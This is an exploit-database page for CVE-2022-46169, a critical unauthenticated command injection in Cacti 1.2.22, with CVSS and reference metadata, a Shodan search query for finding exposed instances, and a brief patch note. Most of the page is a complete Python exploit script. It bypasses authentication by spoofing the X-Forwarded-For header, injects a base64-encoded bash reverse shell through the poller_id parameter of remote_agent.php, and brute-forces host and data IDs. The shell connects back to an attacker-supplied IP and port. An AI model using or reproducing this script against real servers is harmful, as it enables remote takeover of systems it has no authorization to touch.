header-logo
Suggest Exploit
vendor:
Cacti
by:
Riadh BOUCHAHOUA
9.8
CVSS
CRITICAL
Remote Command Execution (RCE)
78
CWE
Product Name: Cacti
Affected Version From: 1.2.2x
Affected Version To: 1.2.22
Patch Exists: YES
Related CWE: CVE-2022-46169
CPE: a:cacti:cacti:1.2.22
Metasploit: https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-46169/https://www.rapid7.com/db/vulnerabilities/debian-cve-2022-46169/https://www.rapid7.com/db/modules/exploit/linux/http/cacti_unauthenticated_cmd_injection/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2022-46169/https://www.rapid7.com/db/vulnerabilities/suse-cve-2022-46169/
Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/
Tags: cve,cve2022,auth-bypass,cacti,kev,rce,unauth
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://security-tracker.debian.org/tracker/CVE-2022-46169https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gfhttps://www.cybersecurity-help.cz/vdb/SB2022121926https://nvd.nist.gov/vuln/detail/CVE-2022-46169https://github.com/Cacti/cacti/commit/7f0e16312dd5ce20f93744ef8b9c3b0f1ece2216
Nuclei Metadata: {'max-request': 1, 'shodan-query': 'title:"Login to Cacti"', 'verified': True, 'vendor': 'cacti', 'product': 'cacti'}
Platforms Tested: Debian 10/11
2022

Cacti v1.2.22 – Remote Command Execution (RCE)

Cacti is vulnerable to Remote Command Execution (RCE) due to improper input validation. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary commands on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Cacti.
Source

Exploit-DB raw data:

# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE)
# Exploit Author: Riadh BOUCHAHOUA
# Discovery Date: 2022-12-08 
# Vendor Homepage: https://www.cacti.net/
# Software Links : https://github.com/Cacti/cacti
# Tested Version: 1.2.2x <= 1.2.22
# CVE: CVE-2022-46169
# Tested on OS: Debian 10/11

#!/usr/bin/env python3
import random
import httpx, urllib

class Exploit:
    def __init__(self, url, proxy=None, rs_host="",rs_port=""):
        self.url = url 
        self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy)
        self.rs_host = rs_host
        self.rs_port = rs_port

    def exploit(self):
        # cacti local ip from the url for the X-Forwarded-For header
        local_cacti_ip  = self.url.split("//")[1].split("/")[0]
    
        headers = {
            'X-Forwarded-For': f'{local_cacti_ip}'
        }
        
        revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'"
        import base64
        b64_revshell = base64.b64encode(revshell.encode()).decode()
        payload = f";echo {b64_revshell} | base64 -d | bash -"
        payload = urllib.parse.quote(payload)
        urls = []
        
        # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell)
        for host_id in range(1,100):
            for local_data_ids in range(1,100):
                urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}")
                
        for url in urls:
            r = self.session.get(url,headers=headers)
            print(f"{r.status_code} - {r.text}" )
        pass

    def random_user_agent(self):
        ua_list = [
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0",
        ]
        return random.choice(ua_list)

def parse_args():
    import argparse
    
    argparser = argparse.ArgumentParser()
    argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)")
    argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True)
    argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True)
    return argparser.parse_args()

def main() -> None:
    # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL 
    args = parse_args()
    e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port)
    e.exploit()

if __name__ == "__main__":
    main()

Navigation

Suggest Exploit

Services By CQR